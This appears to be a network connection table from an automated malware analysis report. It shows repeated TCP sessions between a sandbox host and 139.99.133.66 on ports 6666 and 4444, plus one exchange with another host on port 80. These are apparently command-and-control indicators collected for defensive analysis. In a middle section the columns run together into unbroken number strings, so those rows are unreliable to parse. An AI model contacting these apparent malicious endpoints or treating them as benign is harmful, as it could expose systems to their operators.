                                   Apr 24, 2024 17:04:10.731631994 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731738091 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731786966 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.731806040 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731890917 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731935024 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.732038975 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.732076883 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.732131004 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.775664091 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.775722027 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.775893927 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.875914097 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.920999050 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.090435982 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090492010 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090529919 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090569019 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090600967 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.090637922 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.090668917 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090708017 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090744972 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090771914 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.090862989 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090900898 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.090956926 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.091314077 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.091352940 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.091379881 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:11.091417074 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:11.091454029 CEST  6666         49704      139.99.133.66  192.168.2.5
                                  Apr 24, 2024 17:04:11.091479063 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091514111 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091562033 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091577053 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091612101 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091654062 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091684103 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091713905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091762066 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091787100 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091830969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091869116 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091890097 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.091924906 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091960907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.091980934 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092015982 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092071056 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092145920 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092216969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092253923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092292070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092328072 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092381001 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092395067 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092428923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092483997 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092519999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092557907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092593908 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092624903 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.092654943 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.092720985 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.093069077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.093108892 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.093167067 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.137053013 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.137094021 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.137269974 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.282120943 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.327228069 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.451952934 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.451977968 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.451996088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452028990 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452110052 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452147007 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452313900 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452332973 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452349901 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452368975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452395916 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452419043 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452855110 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452893972 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.452935934 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.452958107 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453001022 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453042030 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453155041 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453265905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453325033 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453435898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453512907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453557968 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453722000 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453773022 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453819990 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.453844070 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453916073 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.453960896 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454468012 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454546928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454613924 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454627991 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454720020 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454739094 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454756975 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454768896 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454788923 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454799891 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454817057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454859972 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454874992 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454893112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.454931974 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.454965115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455008030 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455044985 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.455075979 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455125093 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455163002 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.455180883 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455255985 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.455297947 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.498475075 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.498528004 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.498588085 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.688354969 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.733464956 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813220024 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813246965 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813266993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813285112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813312054 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813324928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813337088 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813357115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813378096 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813396931 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813407898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813448906 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813536882 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813597918 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813638926 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813657999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813676119 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.813720942 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.813996077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814013958 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814063072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814105988 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814156055 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814202070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814512014 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814531088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814574957 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.814666033 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814693928 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.814743042 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815251112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815268993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815346956 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815488100 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815507889 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815525055 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815541983 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815568924 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815583944 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815597057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815614939 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815654993 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815679073 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815696955 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815715075 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815737009 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815747023 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815787077 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815794945 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815810919 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815850019 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.815948009 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.815983057 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.816029072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:11.859643936 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.859685898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:11.859745026 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.094810963 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.139744043 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.174961090 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.175064087 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.175122023 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.200259924 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:12.605875015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:12.606017113 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.012582064 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.034993887 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035141945 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035176992 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035209894 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035268068 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035314083 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035327911 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035397053 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035435915 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035445929 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035501003 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035557032 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035563946 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035684109 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035753012 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035765886 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.077215910 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:14.571896076 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:14.624159098 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:14.988336086 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.030345917 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.343348026 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.344116926 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.704528093 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.704638958 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.705305099 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.750511885 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.750580072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:16.066771030 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:16.067524910 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:16.152832031 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:16.480791092 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.359504938 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.397640944 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.758843899 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.758862019 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.758924007 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.761858940 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.761924982 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.123552084 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.170948029 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.533842087 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.540096045 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.950172901 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.950258017 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:19.355915070 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.028048992 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.389457941 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.389714956 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.390969038 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.767265081 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.768702984 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:25.129985094 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:25.170886993 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:25.420809031 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:25.724340916 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:25.726677895 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:25.726880074 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:26.046205044 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:26.046310902 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:26.077852964 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:26.480777979 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:27.040520906 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:27.040647030 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:29.437134027 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:29.840279102 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:29.840349913 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:30.202245951 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:30.249099016 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:30.610204935 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:30.611762047 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:31.027595043 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:31.027725935 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:31.433986902 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:41.515314102 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:41.918186903 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:41.918346882 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:42.280313015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:42.327068090 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:42.688426971 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:42.689769983 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.105921984 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.106133938 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.325911045 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.327096939 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.511955976 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.736296892 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:44.567497015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:44.623986006 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:44.984982967 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:45.030174971 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:53.592957973 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:53.999402046 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:53.999527931 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:54.361356020 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:54.405122042 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:54.766321898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:54.768198967 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:55.184164047 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:55.184251070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:55.592485905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:05.671264887 CEST497046666192.168.2.5139.99.133.66
Apr 24, 2024 17:05:06.074652910 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:06.077135086 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:06.442715883 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:06.483210087 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:06.844181061 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:06.889477015 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:06.956585884 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:07.372056961 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:07.372217894 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:07.778050900 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:13.361308098 CEST | 4444 | 49715 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:13.362648010 CEST | 49715 | 4444 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:13.777647018 CEST | 4444 | 49715 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:14.567028999 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:14.608272076 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:14.970283031 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:15.014444113 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:17.749406099 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:18.153352976 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:18.153498888 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:18.515654087 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:18.561302900 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:18.924050093 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:18.925594091 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:19.341660023 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:19.341766119 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:19.747463942 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:29.830374956 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:30.246853113 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:30.246923923 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
